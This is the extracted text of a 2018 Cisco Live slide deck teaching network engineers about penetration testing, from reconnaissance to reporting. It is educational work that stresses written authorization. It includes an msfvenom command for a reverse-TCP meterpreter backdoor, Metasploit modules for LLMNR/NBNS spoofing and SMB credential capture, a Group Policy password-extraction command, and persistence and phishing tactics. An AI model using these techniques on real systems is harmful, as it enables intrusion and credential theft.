Cisco Live / DEFCON / RSA / (ISC)2

#CLUS Penetration Testing For Network Engineers Know Yourself and Enemy, Need Not Fear 100 Battles

Joseph Muniz – Architect Americas BRKSEC-2460

#CLUS Cisco Webex Teams

Questions? Use Cisco Webex Teams (formerly Cisco Spark) to chat with the speaker after the session How 1 Find this session in the Cisco Events App 2 Click “Join the Discussion” 3 Install Webex Teams or go directly to the team space 4 Enter messages/questions in the team space

Webex Teams will be moderated cs.co/ciscolivebot#BRKSEC-2460 by the speaker until June 18, 2018.

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 5 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 6 More than Computer and Phones

500B In 2030 50B In 2020 15B Devices Today

Patch Delays

Limited Security Development Rogue Devices

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 10 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 11 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 12 Threats Continue

SamSam

Nyetya

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 20 Agenda • Security Language Defined • Penetration Testing Lab • Testing Concepts • Attacking Websites • Attacking Networks • Attacking People • Attacking Mobile Devices • Attacking IoT • Reporting and Next Steps • Conclusion

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 21 Yeay For Giveaways! #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 23 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 24 Download The CTR Comic

https://www.dropbox.com/s/43qfd9f7p8mk8fm/CTR20- Comic.pdf?dl=0

Security Architect – Americas Sales Organization

Security Researcher –www.thesecurityblogger.com

Speaker: Cisco Live / DEFCON / RSA / (ISC)2

Avid Futbal (Soccer for USA people) Player and Musician

Twitter @SecureBlogger

• Common Language for Security Professionals • Exploit takes advantage of vulnerability. • Exploits are not malware, malware is malicious software. • Vulnerabilities can be exploited. • A dropper or stage 1 payload comes down to the victim. • A RAT is a Remote Access Toolkit/Trojan.

Takes advantage of To deliver Downloading Objective

Malware Goal RATs Exploit vulnerability Dropper/ Rootkit Payload

Takes advantage of To deliver Downloading Objective

Malware Goal RATs Exploit vulnerability Dropper/ Rootkit Payload

Takes advantage of To deliver Downloading Objective

Malware Goal RATs Exploit vulnerability Dropper/ Rootkit Payload

Takes advantage of To deliver Downloading Objective

Malware Goal RATs Exploit vulnerability Dropper/ Rootkit Payload

• Risk Management – Dealing with any type of risk • Vulnerability Management – Dealing with vulnerabilities • Incident Response – Responding to attacks • Audit – Checking for compliance • Digital Forensics – Investigating breaches / legal needs • Hacking – Unlocking features / creating new capabilities

Assessment – Automated tools looking for vulnerabilities

Pentest – Testing vulnerabilities using real exploitation

• Legal or Business • Should be minimal security • SOC enforces and reports • Customized dashboards can help!

AIM for going beyond compliance

. Assessment – Using automated systems to identify potential vulnerabilities . Penetration Test – Executing attacks against identified vulnerabilities

Assessment is good to see your weaknesses Penetration Testing is good if you know you are secure

Vulnerability Type: Apache vulnerability Threat Description: Three vulnerabilities in the Apache Struts 2 package Existing Controls: Firewalled and monitored by IPS Probability: Unlikely (not web facing) Impact: Critical http://cve.mitre.org/about/faqs.html

Challenges

• May not be real • Hard to execute • Not accessible • Critical or not? • Specific requirements

• NAC and Profiling can help with Asset Inventory

• Triggers • CVE Identifier may trigger event • Assessment tools • Audits

• Automate Network Access • Continuously Assess for vulnerabilities • Develop Risk Rating Strategy • Automate Enforcement (if possible) • Enforce Posture Upon Connection • Enforce Patch Management • Subscribe and Follow Researchers • Don’t Trust Everything You Hear

White Box Grey Box Black Box

• Know target details • Some details • No details • Topology given • Some topology • Unknown topology • Informed parties • Limited awareness • No awareness • Limited attacks • Many attacks • Any attack

Very specific work Hybrid work Attack Anyway Possible

• Internal teams typically perform White Box • Grey Box is typically the best value • Black Box can give interesting results and most realistic • Reconnaissance is typically the most costly service

Work must be properly authorized!

• Define target systems • Risks / Critical • Timeframe Operation Areas • Evaluation methods • Target space • Tools and Software • Define flag • Notified parties • Deliverable • Initial access level • Expected remediation • Authorization • Assumptions

• Legal rights to perform the test • Systems could be harmed • Alarms could be triggered • Problems will likely be found, now you know and must deal with them • Boundaries need to be established

• Authorization in writing • Signed by the right person • State risks • Assign liability to stakeholder

Make sure to have this!

Open Source Penetration Testing Arsenal Many Great Forensics Tools

Download www.kali.org

Make sure to update Apt-get update Apt-get upgrade

Penetration testing tool used for executing exploit code against a remote target machine.

Hundreds of exploits available

Search vulnerability and use MSF to deliver a packaged attack against the weakness.

Gain shell access, disrupt target, etc.

Search struts in FirepowerWhy can this be bad?

Lots of signatures for struts attacks come up

Note:Search struts Ethical in Firepower Security Venders Don’t Always Tell

Lots of signatures for struts attacks come up

https://www.cuckoosandbox.org/

Credential and Non- Credential is Key

Vmware Fusion Kali USB Internet Option MAC OSX

Kali Linux Windows 200 Gig 7 Mobile Storage

Weaponize Deliver Exploit Install Command Action & Control

Physical Digital • Intel Gather • Surveil • Scan • Pick • Assess • Force • Exploit • Conceal • Persist • Persist • Propagate Converged • Exfiltrate Attack Converged attacks are most Social effective and most difficult to thwart • Targeted Phishing • Conning Guards/Staff • Impersonation • Phone Phishing • Create Spies

Keyboard Drivers System Backdoor Network Backdoor

https://hakshop.com

• Poison Tap or Responder – Grab Passwords from Locked windows systems • Reverse SSH – Encrypted tunnel off network • Root Scripts – Gain shell • Many many more …. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

NMAP shows Open Ports! Nexpose shows vulnerabilities Metasploit delivers attack

• Learn everything about target

• 1st step in an attack and most time consuming

• More you know = better attack

• Find quickest and most effective approach

• MASSSCAN / NMAP – Scanners • (RIR) / EDGAR – Registered public info • Profiling – Best guess about endpoint (ex NMAP –A) • Public Data– waybackmachine, Maltigo, Shodan.io • Burp – Communication monitoring • Scanner – Vulnerability searching • Google Maps / Images / etc – Physical layout and social

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 79 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 80 Weaponization Build Rootkit

Package With Application Encode until unrecognizable

Metasploit – Framework for developing and executing exploit code against a remote target machine

• Obtain access to multiple systems

• If one foothold removed, others available

• Accomplished through exploitation and lateral movement also known as Pivoting

• Keyboard access to network • Through compromised hosts, systems, etc • Best to NOT show two way display • Sometimes bot network • Blends in with common traffic

Hard to detect!

• Data removed from network

• Potentially encrypted (reverse SSH)

• Could break up the data

• Send it with sporadic timing

92% of Internet devices surveyed were running known vulnerabilities, average of 26 each

• Whois – Example [email protected] • Google Hacking – intext: classifed | “this file generated by Nessus” | intitle:index.of inbox dbx • Wayback Machine – Find old versions of website • Robots.txt – Websites they want hidden from spiders • Banners – Free info about the system • DIG – DNS info

• ICANN – https://www.icann.org/ • EDGAR – Public company records • Regional Internet Registries (RIR) • USA – www.arin.net/index.html • Asia Pasicfic – http://apnic.net/ • Europe – http://www.ripe.net • Latin America - http://www.lacnic.net • African - https://www.afrinic.net/en/about/service- region

• Domain information Grouper (DIG) • Mxtoolbox – web tool

Find DSN Suffix in use on the domain • Cat /etc/resolv.conf

Find list of Domain Controllers • Nslookup • set q=SRV • _ldap._tcp.dc._msdcs.

• ICMP Port unreachable messages • Banners • Binaries • Port Signatures • Non-standard handshakes • Response to synfloods • Packets with non-standard TCP/IP Flags

Tools like NMAP can do this for you

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 94 Network Mapper NMAP • NMAP • -sP = Network Discovery • -sT = Host Discovery • -sV = Service Interrogation • -sU = UDP scanning • -sA = Map out firewall rulesets (stateful?, Filter ports?) • -sF = Discover closed ports

• Hping3 - Command-line oriented TCP/IP packet assembler/analyzer

• Completing the handshake could be illegal! • -sT = illegal | -sS = not illegal (not legal advise!)

• Syn Scan – Half open scan for stealth • Add delay (example “--scan_delay 90000”) • Sending ICMP traffic with different types • Response doesn’t matter. Looking for hosts! Save active devices to file cat alive-scan.txt | grep "report for" | awk '{print $5}' | tee alive-IPs.txt

• Determine services/daemons that are running to find exploits! (ex nmap –sV) • Port numbers – www.iana.org/assignments/port-numbers • Ports can run any service! You should interrogate by connecting to it. • Example: telnet to a port 25

Also gather other data like Banners ->

• Easy to get to, poor security and most vulnerable! • OWASP – Great resource for news and standards

• Cross Site Scripting (XSS) • Information Leakage and Improper Error Handling • Injection Flaws • Broken Authentication and • Malicious File Execution Session Management • Insecure Direct Object • Insecure Cryptographic Storage Reference • Insecure Communications • Cross Site Request Forgery • Failure to Restrict URL Access

One

Three Two

• No security = Instant access • Port security = Possible static MAC list • NAC = Need to beat assessment profile • NAC is port driven, try weird ports

Spoofing trusted devices may work

• Default Community – public / private • Spoof address of manager or devices • Typically won’t notice ”quite” devices • Brute force SNMP authentication • Typically not monitored • SNMP walking – Try strings across multiple systems • SNMP brute force – Run a .txt file of strings • SNMP attacking - Abuse when rw is enabled

Onesixtyone – Brute Force with text file

Snmpwalk – Test various community strings

Public Exists Private Doesn’t

Change SNMP if RW is enabled! Find it by grep v1

. Inline – direct real-time live traffic . SPAN port – copy of traffic

PCAP = Historical Live should have filtering (example TCPDump filter on POST) tcp.flags.syn && tcp.flags.ack==0 tcp.flags.syn==1 && tcp.flags.ack==1 = tcp.flags.reset && tcp.flags.ack

Karma – Ability to clone SSIDs and man-in-the-middle the mobile device

SSL-Strip – Removing HTTPS request so authentication is in the clear.

Defending ????

Karma – Ability to clone SSIDs and man-in-the-middle the mobile device

SSL-Strip – Removing HTTPS request so authentication is in the clear.

Defending

• VPN • Disable Auto WiFi Connect • WIDS/WIPS • Remove HTTP from critical servers

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 106 How Easy is Getting Wireless MiTM? WiFi Pineapple • Wireless Pretesting Tool • Can Spoof SSID and performan SSL-Strip • Cost: $100 - $200 dollars from hack5

Raspberry Pi • $35 dollar computer • Can host any OS including Kali Linux • Kali Linux offers multiple penetration testing applications

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 107 How Easy is Getting Wireless MiTM? WiFi Pineapple • Wireless Pretesting Tool • Can Spoof SSID and performan SSL-Strip • Cost: $100 - $200 dollars from hack5

Raspberry Pi • $35 dollar computer • Can host any OS including Kali Linux • Kali Linux offers multiple penetration testing applications

• Get network traffic through your device • ARP poison • Inline • Proxy (network or host)

PacketSquirrel | Ettercap = Easy Testing

• Abuse Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Services (NetBios-NS)

• Both resolve hostnames to IP addresses

• Trick victim to connect to Kali Linux instead of capturing credentials

auxiliary/spoof/llmnr/llmnr_response auxiliary/spoof/nbns/nbns_response auxiliary/server/capture/smb #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 110 Window - ShareCheck

• Use of non standard local admin accounts • Windows file sharing vulnerabilities • Global groups granted local admin acess • Insecure account lockout

http://www.sec-1.com/blog/2014/sharecheck

• Injecting False Information • Wiping logs • Adjusting Timestamps • Word Wrapping – Using white space padding • HTML or Terminal attack

• Allow root remote - /etc/ssh/sshd_config, comment out “PermitRootLogin no” • Netcat • Create account on exiting FTP / SSH • Lightweight FTP – BabyFTP | Vsftpd | Mollensoft FTP

Avoid Trojans and Keyloggers – Painful Cleanup!

• Total Connections: 170 Employees, 71 Cisco; 22 NetApp; 10 EMC; 35 McAfee; 300+ Facebook friends

• Endorsements: 22 LinkedIn Endorsements, For Expertise and Experience; From Partners and co- workers

• Offers: 4 job offers, Laptop and office equipment, network access.

• Use Facebook and LinkedIN as a weapon • What do you leave on social networks that could be used against you? • Hide attacks in Social Media messages • Read their E-mail / Posts / Etc and learn their language

• Use Facebook and LinkedIN as a weapon • What do you leave on social networks that could be used against you? • Hide attacks in Social Media messages

• Best to customize based on Recon • Tie it to holiday / events • Language is everything! • Goal can be info or cause action

Practice this skill

• Hook victim browsers as beachheads for attacks • Social engineer to click customized link • Available attacks depend on current browser vulnerabilities • Can track hooked systems

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 123 #CLUS © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public #CLUS © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public Social Engineering Tool Kit (SET)

• Easily clone a website • Create various phishing attacks • Create payload and listener • Mailer attacks • Powershell attacks • And many many more ….

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 126 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 127 Business Email Compromise

Attacker

[email protected]: We have conference dues to pay that are late. Pay at www.hackme.com/dues

Cisco Financial

[email protected]: Ok I’m on it!

Bypass signature based detection

(Un)Packer Frequently Changed

Payload (unpacked malware) Changed Less frequently

Executable

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 130 Encoding 1 – Create Backdoor Metasploit msfvenom -p python/meterpreter/reverse-underscore-tcp LHOST = ANYIP LPORT= ANY PORT R> anyname.py Senna

• Open With Text Editor • Decode with online source https://www.base64decode.org/

Copy Sourcecode Paste and Modify

• Cpasswords – Group Policy Passwords encrypted but reversible • GP3finder simplifies gp3finder.py -A -t DOMAIN_CONTROLLER -u DOMAINUSER

• Mimikatz – Meterpreter password extraction

• Incognito – Enumerate and impersonate tokens

• Exploit Framework targeting Windows • Listener – Waits for connection • Stager – Code placed on compromised system • Agent – Maintain connection between you and victim • Run commands in memory. • Antivirus hates this!

• BIOS – Try manufacture password • Guessing or Recovering a password (admin | password | cisco | blank | vender name) • Dictionary / Rainbow Tables • Man-in-the-middle • Attacking encryption

• Brutus - Remote online cracking tool • RainbowCrack - Hash cracker tool, Windows/Linux based • Wfuzz - Web application brute forcing (GET / POST), (SQL, XSS, LDAP,etc) • Cain and Able - Few features of password cracking ability • John the Ripper - Offline mode, auto hash password type detector, • THC Hydra - Dictionary attack tool for many databases, over 30 protocols • AirCrack-NG - WEP and WPA-PSK keys cracking • OphCrack / Medusa / L0phtCrack / Etc. ……

• Windows Password Storage – SAM • SYSKEY – Additional SAM encryption • Linux Password Storage – passwd / shadow • Attacking Active Directory • Local Secuirty Authority (LSA) cached accounts • Microsoft Hashing types

• Mobile exploitation constantly changing • New vulnerabilities constantly discovered • Venders are improving patching • Attack tools constantly improving

Attacks are not black and white – TEST!

• Jailbreaking usually older iOS • Attack iTunes Backups • AnyTrans or iPhone Backup Extractor • iOS Snapshots

• Older - Connect to like mass storage • Version 6 or later – Encrypted • Root device – KingoRoot • SMS data base /data/data/com.android.providers.telephony/databases/mmssms.db • Script to read SMS SELECT datetime(date/1000, 'unixepoch','localtime') ,datetime(date_sent/1000, 'unixepoch','localtime') ,person,body FROM sms WHERE thread_id = 310 ORDER BY date

+------+ | date | date_sent | person | body | |------| 2017-10-20 13:48:18 | 2017-10-20 13:48:16 | 54 | Hello Randy! Where should I send my Cisco live presentation? | | 2017-10-20 16:34:03 | 2017-01-01 02:00:00 | | Damn, thanks ! for texting jet | | 2017-10-20 16:40:02 | 2017-10-20 16:40:01 | 54 | Jet? When you are a Jet, you’re a jet? West Side?? | | Stupid auto correct! | I’m going to dropkick you Joey ... And this phone

• Most phones lock if brute forced • TIP: Plug in a keyboard bypass this. • TIP2: Rubber Ducky abuses keyboard drivers and effective brute force tool

• Cellebrite or Elcomsoft are good but pricy! • Know even professional tools have limitations!

Power plugs Cameras

• Micro drive or plug to access hardware

• Firmware security analysis and modification Power plugs Cameras • Radio- / wireless-based exploitation

• Application exploitation

• Hardware exploitation (example JTAG)

• Mobile Application Downloads • Web dashboards and resources • Firmware or source code • Any available APIs • Plugs to access hard drive / removable storage

Firmware – Code running on the hardware (bootloader, file systems, kernel, etc.)

Many devices don’t validate firmware!

Call support for help!

• Common for unauthenticated root when tapping into the hardware • Identify UART or JTAG pins • Use multimeter to find ground, transmit and receive • Connect to exploitation tool (ATTIFY Badge), adjust baud rate until you can read. Its likely to be unauthenticated.

• Software Defined Radio • ZigBee Exploitation • Bluetooth

Example Attack Methods

Man-in-the-middle attack Insecure CRC verification Replay attack Clear text

• People can be terminated • Critical vulnerabilities could be overlooked • Money and time could be wasted • Choose your tone wisely • Expect various education types to read it • Include details (tools, time, process) • Define acronyms

• Target Audience – Who will read it • Report Classification – Could contain sensitive information • All information collected – Need to list everything (notes, screenshots, etc.) • Summary of findings • Summary of recommendation

. Vulnerabilities – What you found . Impact – Potential damage

. Likelihood – How hard to execute

. Risk evaluation – Impact to business . Recommendation – Remediation steps

. References – Who worked on what

. Additional details – Appendices, Glossary, Tools used, etc.

Example Offensive Security https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf

BRKSEC-2460 160 Next Steps

Give us your feedback to be entered into a Daily Survey Drawing. Complete your session surveys through the Cisco Live mobile app or on www.CiscoLive.com/us.

Don’t forget: Cisco Live sessions will be available for viewing on demand after the event at www.CiscoLive.com/Online.

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 162 Continue Demos in Walk-in Meet the Related your the Cisco self-paced engineer sessions education campus labs 1:1 meetings

#CLUS #CLUS